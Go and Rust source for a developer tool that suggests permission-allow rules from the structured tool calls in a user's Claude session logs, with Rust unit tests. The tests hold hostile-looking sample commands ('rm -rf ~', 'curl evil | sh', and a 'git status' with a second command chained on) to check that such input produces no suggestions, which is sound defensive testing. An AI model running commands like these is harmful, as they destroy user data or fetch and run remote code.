File: internal/insights/permissions_analyzer/analyzer.go
// Package permissions_analyzer (W30) mines the user's OWN structured tool_use
// records to SUGGEST permission-allow rules. Security-critical: suggestions
// derive ONLY from structured tool_use records (things a session actually
// invoked) — NEVER from conversation free text, message content, or
// history.jsonl. The root claude directory is threaded by the caller; nothing
// is ever written (suggestions only).
package permissions_analyzer

import (
	"encoding/json"
	"fmt"
	"os"
	"path/filepath"
	"sort"
	"strings"

	"claude-devtools/internal/discovery"
	"claude-devtools/internal/domain"
	"claude-devtools/internal/parsing"
)

// Recurrence gate: a candidate rule is only suggested when it recurs enough to
// be a habit rather than a one-off — at least minEvidenceCount invocations
// spread across at least minSessionCount distinct sessions.
const (
	minEvidenceCount = 5
	minSessionCount  = 3
	maxSamples       = 3
	maxSampleLen     = 200
	listAllow        = "allow"
)

// Suggestion is a proposed permission-allow rule mined from tool_use records.
// List is always "allow". EvidenceCount is the total invocation count;
// SessionCount is the number of distinct sessions the rule was observed in;
// Samples holds up to a few example invocation strings for the reviewer.
type Suggestion struct {
	Rule          string   `json:"rule"`
	List          string   `json:"list"`
	EvidenceCount int      `json:"evidenceCount"`
	SessionCount  int      `json:"sessionCount"`
	Samples       []string `json:"samples"`
}

// cmdStat accumulates evidence for a single candidate key (an exact Bash
// command or a non-Bash tool name): total count, the distinct sessions it
// appeared in, and up to maxSamples example invocation strings.
type cmdStat struct {
	count    int
	sessions map[string]struct{}
	samples  []string
}

// AnalyzeUsage enumerates every project under root's projects directory, streams
// each session file through the parser, and returns narrowest-match permission
// suggestions mined ONLY from structured tool_use records. Rules already present
// in root's settings.json permissions.allow are skipped. The returned slice is
// never nil.
func AnalyzeUsage(root string) ([]Suggestion, error) {
	base := discovery.GetProjectsBasePath(root)
	existing := loadExistingAllowRules(root)

	bashCommands := map[string]*cmdStat{}
	nonBashTools := map[string]*cmdStat{}

	entries, err := os.ReadDir(base)
	if err != nil {
		if os.IsNotExist(err) {
			return []Suggestion{}, nil
		}
		return nil, fmt.Errorf("permissions_analyzer: read projects dir: %w", err)
	}

	for _, entry := range entries {
		if !entry.IsDir() {
			continue
		}
		// A single unreadable/malformed project must not fail the whole scan.
		scanProjectDir(filepath.Join(base, entry.Name()), bashCommands, nonBashTools)
	}

	suggestions := []Suggestion{}
	suggestions = append(suggestions, deriveBashSuggestions(bashCommands, existing)...)
	suggestions = append(suggestions, deriveNonBashSuggestions(nonBashTools, existing)...)
	sort.Slice(suggestions, func(i, j int) bool {
		return suggestions[i].Rule < suggestions[j].Rule
	})
	return suggestions, nil
}

// scanProjectDir walks a project's *.jsonl session files and records every
// structured tool_use call. Errors on a single file are tolerated (skip and
// continue) so one corrupt session cannot poison the aggregate.
func scanProjectDir(projectDir string, bashCommands, nonBashTools map[string]*cmdStat) {
	files, err := os.ReadDir(projectDir)
	if err != nil {
		return
	}
	for _, f := range files {
		name := f.Name()
		if f.IsDir() || !strings.HasSuffix(name, ".jsonl") {
			continue
		}
		path := filepath.Join(projectDir, name)
		parsed, err := parsing.ParseSessionFile(path)
		if err != nil {
			continue
		}
		for i := range parsed.Messages {
			for _, tc := range parsed.Messages[i].ToolCalls {
				recordToolCall(tc, path, bashCommands, nonBashTools)
			}
		}
	}
}

// recordToolCall aggregates one structured tool_use call. Bash calls are keyed
// by their exact command string; every other tool is keyed by its name. The
// session key is the session file path (unique per session). Only tool_use
// input is read — never message text.
func recordToolCall(tc domain.ToolCall, sessionKey string, bashCommands, nonBashTools map[string]*cmdStat) {
	if tc.Name == "Bash" {
		cmd := extractBashCommand(tc.Input)
		if cmd == "" {
			return
		}
		addStat(bashCommands, cmd, sessionKey, truncateSample(cmd))
		return
	}
	if tc.Name == "" {
		return
	}
	addStat(nonBashTools, tc.Name, sessionKey, truncateSample(toolSample(tc)))
}

// addStat records one invocation of key: bump count, note the session, and
// keep up to maxSamples distinct example strings.
func addStat(m map[string]*cmdStat, key, sessionKey, sample string) {
	st := m[key]
	if st == nil {
		st = &cmdStat{sessions: map[string]struct{}{}}
		m[key] = st
	}
	st.count++
	st.sessions[sessionKey] = struct{}{}
	if len(st.samples) < maxSamples && !contains(st.samples, sample) {
		st.samples = append(st.samples, sample)
	}
}

// extractBashCommand decodes the tool_use input map and returns the trimmed
// "command" string. Anything malformed yields "" (skipped).
func extractBashCommand(input domain.RawValue) string {
	if len(input) == 0 {
		return ""
	}
	var m map[string]json.RawMessage
	if json.Unmarshal(input, &m) != nil {
		return ""
	}
	raw, ok := m["command"]
	if !ok {
		return ""
	}
	var cmd string
	if json.Unmarshal(raw, &cmd) != nil {
		return ""
	}
	return strings.TrimSpace(cmd)
}

// toolSample renders a compact example string for a non-Bash tool call from its
// structured input, falling back to the tool name when the input is empty.
func toolSample(tc domain.ToolCall) string {
	s := strings.TrimSpace(string(tc.Input))
	if s == "" || s == "null" {
		return tc.Name
	}
	return s
}

// loadExistingAllowRules reads root's settings.json and returns the set of rules
// already granted in permissions.allow — no point suggesting an existing grant.
// A missing or malformed file yields an empty set. Root is threaded (never the
// hardcoded ~/.claude), so the scan and the skip-set share one source of truth.
func loadExistingAllowRules(root string) map[string]bool {
	out := map[string]bool{}
	raw, err := os.ReadFile(filepath.Join(root, "settings.json"))
	if err != nil {
		return out
	}
	var parsed struct {
		Permissions struct {
			Allow []string `json:"allow"`
		} `json:"permissions"`
	}
	if json.Unmarshal(raw, &parsed) != nil {
		return out
	}
	for _, rule := range parsed.Permissions.Allow {
		out[rule] = true
	}
	return out
}

File: src-tauri/src/insights/permissions_analyzer/analyzer.rs
use std::collections::{HashMap, HashSet};
use std::path::Path;

use serde::{Deserialize, Serialize};
use serde_json::Value;

use crate::discovery::path_decoder;
use crate::parsing::session_parser;
use crate::types::messages::ToolCall;

use super::rules;

// Recurrence gate: a candidate rule is only suggested when it recurs enough to
// be a habit rather than a one-off — at least MIN_EVIDENCE_COUNT invocations
// across at least MIN_SESSION_COUNT distinct sessions.
pub(super) const MIN_EVIDENCE_COUNT: u32 = 5;
pub(super) const MIN_SESSION_COUNT: usize = 3;
pub(super) const MAX_SAMPLES: usize = 3;
const MAX_SAMPLE_LEN: usize = 200;
pub(super) const LIST_ALLOW: &str = "allow";

/// A proposed permission-allow rule mined from tool_use records. `list` is
/// always "allow"; `evidence_count` is the total invocation count;
/// `session_count` is the number of distinct sessions it was observed in;
/// `samples` holds up to a few example invocation strings for the reviewer.
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct Suggestion {
    pub rule: String,
    pub list: String,
    pub evidence_count: u32,
    pub session_count: u32,
    pub samples: Vec<String>,
}

/// Accumulates evidence for a single candidate key (an exact Bash command or a
/// non-Bash tool name).
#[derive(Default)]
pub(super) struct CmdStat {
    pub(super) count: u32,
    pub(super) sessions: HashSet<String>,
    pub(super) samples: Vec<String>,
}

/// Enumerates every project under `root`'s projects directory, streams each
/// session file through the parser, and returns narrowest-match permission
/// suggestions mined ONLY from structured tool_use records. Rules already
/// present in `root`'s settings.json permissions.allow are skipped. The returned
/// vec is never nil; an unreadable projects dir yields an empty vec.
pub fn analyze_usage(root: &Path) -> Vec<Suggestion> {
    let base = path_decoder::get_projects_base_path(root);
    let existing = load_existing_allow_rules(root);

    let mut bash_commands: HashMap<String, CmdStat> = HashMap::new();
    let mut non_bash_tools: HashMap<String, CmdStat> = HashMap::new();

    // Go's os.ReadDir returns entries sorted by filename; mirror that so sample
    // collection order is deterministic.
    let mut entries: Vec<_> = match std::fs::read_dir(&base) {
        Ok(rd) => rd.flatten().collect(),
        Err(_) => return Vec::new(),
    };
    entries.sort_by_key(|e| e.file_name());

    for entry in entries {
        let is_dir = entry.file_type().map(|t| t.is_dir()).unwrap_or(false);
        if !is_dir {
            continue;
        }
        // A single unreadable/malformed project must not fail the whole scan.
        scan_project_dir(&entry.path(), &mut bash_commands, &mut non_bash_tools);
    }

    let mut suggestions: Vec<Suggestion> = Vec::new();
    suggestions.extend(rules::derive_bash_suggestions(&bash_commands, &existing));
    suggestions.extend(rules::derive_non_bash_suggestions(&non_bash_tools, &existing));
    suggestions.sort_by(|a, b| a.rule.cmp(&b.rule));
    suggestions
}

/// Walks a project's *.jsonl session files and records every structured
/// tool_use call. Errors on a single file are tolerated (skip and continue).
fn scan_project_dir(
    project_dir: &Path,
    bash_commands: &mut HashMap<String, CmdStat>,
    non_bash_tools: &mut HashMap<String, CmdStat>,
) {
    let mut files: Vec<_> = match std::fs::read_dir(project_dir) {
        Ok(rd) => rd.flatten().collect(),
        Err(_) => return,
    };
    files.sort_by_key(|e| e.file_name());

    for f in files {
        let name = f.file_name();
        let name = name.to_string_lossy();
        let is_dir = f.file_type().map(|t| t.is_dir()).unwrap_or(false);
        if is_dir || !name.ends_with(".jsonl") {
            continue;
        }
        let path = f.path();
        let parsed = match session_parser::parse_session_file(&path) {
            Ok(p) => p,
            Err(_) => continue,
        };
        let session_key = path.to_string_lossy().to_string();
        for msg in &parsed.messages {
            for tc in &msg.tool_calls {
                record_tool_call(tc, &session_key, bash_commands, non_bash_tools);
            }
        }
    }
}

/// Aggregates one structured tool_use call. Bash calls are keyed by their exact
/// command string; every other tool is keyed by its name. Only tool_use input
/// is read — never message text.
fn record_tool_call(
    tc: &ToolCall,
    session_key: &str,
    bash_commands: &mut HashMap<String, CmdStat>,
    non_bash_tools: &mut HashMap<String, CmdStat>,
) {
    if tc.name == "Bash" {
        let cmd = extract_bash_command(&tc.input);
        if cmd.is_empty() {
            return;
        }
        let sample = truncate_sample(&cmd);
        add_stat(bash_commands, &cmd, session_key, sample);
        return;
    }
    if tc.name.is_empty() {
        return;
    }
    let sample = truncate_sample(&tool_sample(tc));
    add_stat(non_bash_tools, &tc.name, session_key, sample);
}

/// Records one invocation of `key`: bump count, note the session, and keep up to
/// MAX_SAMPLES distinct example strings (in first-seen order).
fn add_stat(m: &mut HashMap<String, CmdStat>, key: &str, session_key: &str, sample: String) {
    let st = m.entry(key.to_string()).or_default();
    st.count += 1;
    st.sessions.insert(session_key.to_string());
    if st.samples.len() < MAX_SAMPLES && !st.samples.contains(&sample) {
        st.samples.push(sample);
    }
}

/// Decodes the tool_use input and returns the trimmed "command" string. Anything
/// malformed yields "" (skipped).
fn extract_bash_command(input: &Value) -> String {
    match input.get("command").and_then(|v| v.as_str()) {
        Some(cmd) => cmd.trim().to_string(),
        None => String::new(),
    }
}

/// Renders a compact example string for a non-Bash tool call from its structured
/// input, falling back to the tool name when the input is empty/null.
fn tool_sample(tc: &ToolCall) -> String {
    let s = serde_json::to_string(&tc.input).unwrap_or_default();
    let s = s.trim();
    if s.is_empty() || s == "null" {
        tc.name.clone()
    } else {
        s.to_string()
    }
}

/// Reads `root`'s settings.json and returns the set of rules already granted in
/// permissions.allow. A missing or malformed file yields an empty set.
fn load_existing_allow_rules(root: &Path) -> HashSet<String> {
    let raw = match std::fs::read_to_string(root.join("settings.json")) {
        Ok(r) => r,
        Err(_) => return HashSet::new(),
    };

    #[derive(Deserialize, Default)]
    struct Perms {
        #[serde(default)]
        allow: Vec<String>,
    }
    #[derive(Deserialize)]
    struct Settings {
        #[serde(default)]
        permissions: Perms,
    }

    match serde_json::from_str::<Settings>(&raw) {
        Ok(s) => s.permissions.allow.into_iter().collect(),
        Err(_) => HashSet::new(),
    }
}

/// Caps a display sample to MAX_SAMPLE_LEN runes (chars).
fn truncate_sample(s: &str) -> String {
    if s.chars().count() <= MAX_SAMPLE_LEN {
        s.to_string()
    } else {
        s.chars().take(MAX_SAMPLE_LEN).collect()
    }
}

#[cfg(test)]
mod tests {
    use super::*;
    use std::path::PathBuf;
    use std::sync::atomic::{AtomicU32, Ordering};

    static COUNTER: AtomicU32 = AtomicU32::new(0);

    fn make_root(sessions: &[(&str, Vec<String>)]) -> PathBuf {
        let n = COUNTER.fetch_add(1, Ordering::SeqCst);
        let root =
            std::env::temp_dir().join(format!("perm_analyzer_{}_{}", std::process::id(), n));
        let _ = std::fs::remove_dir_all(&root);
        let proj = root.join("projects").join("-Users-test-proj");
        std::fs::create_dir_all(&proj).unwrap();
        for (name, lines) in sessions {
            let content = lines.join("\n") + "\n";
            std::fs::write(proj.join(name), content).unwrap();
        }
        root
    }

    fn write_settings(root: &Path, allow: &[&str]) {
        let settings = serde_json::json!({ "permissions": { "allow": allow } });
        std::fs::write(root.join("settings.json"), settings.to_string()).unwrap();
    }

    fn tool_use_line(uuid: &str, tool: &str, input: Value) -> String {
        serde_json::json!({
            "type": "assistant",
            "uuid": uuid,
            "timestamp": "2026-01-01T00:00:00Z",
            "message": {
                "role": "assistant",
                "content": [
                    {"type": "tool_use", "id": format!("{uuid}-t"), "name": tool, "input": input}
                ]
            }
        })
        .to_string()
    }

    fn bash_line(uuid: &str, cmd: &str) -> String {
        tool_use_line(uuid, "Bash", serde_json::json!({ "command": cmd }))
    }

    fn bash_lines(prefix: &str, cmd: &str, n: usize) -> Vec<String> {
        (0..n)
            .map(|i| bash_line(&format!("{prefix}-{i}"), cmd))
            .collect()
    }

    fn assistant_text_line(uuid: &str, text: &str) -> String {
        serde_json::json!({
            "type": "assistant",
            "uuid": uuid,
            "timestamp": "2026-01-01T00:00:00Z",
            "message": {
                "role": "assistant",
                "content": [{"type": "text", "text": text}]
            }
        })
        .to_string()
    }

    fn user_string_line(uuid: &str, text: &str) -> String {
        serde_json::json!({
            "type": "user",
            "uuid": uuid,
            "timestamp": "2026-01-01T00:00:00Z",
            "message": {"role": "user", "content": text}
        })
        .to_string()
    }

    fn find_rule<'a>(sugs: &'a [Suggestion], rule: &str) -> Option<&'a Suggestion> {
        sugs.iter().find(|s| s.rule == rule)
    }

    fn any_rule_contains(sugs: &[Suggestion], sub: &str) -> bool {
        sugs.iter().any(|s| s.rule.contains(sub))
    }

    #[test]
    fn recurring_exact_command_yields_narrow_rule() {
        let root = make_root(&[
            ("s1.jsonl", bash_lines("s1", "make build", 2)),
            ("s2.jsonl", bash_lines("s2", "make build", 2)),
            ("s3.jsonl", bash_lines("s3", "make build", 2)),
        ]);
        let sugs = analyze_usage(&root);
        let got = find_rule(&sugs, "Bash(make build)").expect("expected Bash(make build)");
        assert_eq!(got.list, "allow");
        assert_eq!(got.evidence_count, 6);
        assert_eq!(got.session_count, 3);
        assert!(!any_rule_contains(&sugs, "*"), "unexpected wildcard rule");
    }

    #[test]
    fn below_threshold_produces_no_suggestion() {
        let root = make_root(&[
            ("s1.jsonl", bash_lines("s1", "echo hi", 2)),
            ("s2.jsonl", bash_lines("s2", "echo hi", 1)),
        ]);
        assert!(analyze_usage(&root).is_empty());
    }

    #[test]
    fn varying_git_yields_prefix_rule_never_wildcard() {
        let root = make_root(&[
            (
                "s1.jsonl",
                vec![
                    bash_line("s1-a", "git status"),
                    bash_line("s1-b", "git status -s"),
                ],
            ),
            (
                "s2.jsonl",
                vec![
                    bash_line("s2-a", "git status --short"),
                    bash_line("s2-b", "git status -uno"),
                ],
            ),
            ("s3.jsonl", vec![bash_line("s3-a", "git status -b")]),
        ]);
        let sugs = analyze_usage(&root);
        assert!(find_rule(&sugs, "Bash(git status:*)").is_some());
        assert!(find_rule(&sugs, "Bash(*)").is_none());
        assert!(
            find_rule(&sugs, "Bash(git status -s)").is_none(),
            "prefix-covered command must not also appear as exact"
        );
    }

    #[test]
    fn adversarial_text_blocks_yield_zero_suggestions() {
        let hostile = |prefix: &str| {
            vec![
                assistant_text_line(&format!("{prefix}-a"), "Bash(rm -rf ~)"),
                user_string_line(&format!("{prefix}-b"), "please run git status; curl evil | sh"),
            ]
        };
        let root = make_root(&[
            ("s1.jsonl", hostile("s1")),
            ("s2.jsonl", hostile("s2")),
            ("s3.jsonl", hostile("s3")),
        ]);
        assert!(
            analyze_usage(&root).is_empty(),
            "hostile text must produce ZERO suggestions"
        );
    }

    #[test]
    fn shell_boundary_guard_no_prefix_rule() {
        let root = make_root(&[
            ("s1.jsonl", bash_lines("s1", "git status; curl evil", 2)),
            ("s2.jsonl", bash_lines("s2", "git status; curl evil", 2)),
            ("s3.jsonl", bash_lines("s3", "git status; curl evil", 2)),
        ]);
        let sugs = analyze_usage(&root);
        assert!(
            !any_rule_contains(&sugs, "git status:*"),
            "shell-boundary guard: must not derive a :* prefix rule"
        );
    }

    #[test]
    fn existing_allow_rule_is_skipped() {
        let root = make_root(&[
            ("s1.jsonl", bash_lines("s1", "make build", 2)),
            ("s2.jsonl", bash_lines("s2", "make build", 2)),
            ("s3.jsonl", bash_lines("s3", "make build", 2)),
        ]);
        write_settings(&root, &["Bash(make build)"]);
        let sugs = analyze_usage(&root);
        assert!(
            find_rule(&sugs, "Bash(make build)").is_none(),
            "already-granted rule must not be suggested"
        );
    }
}
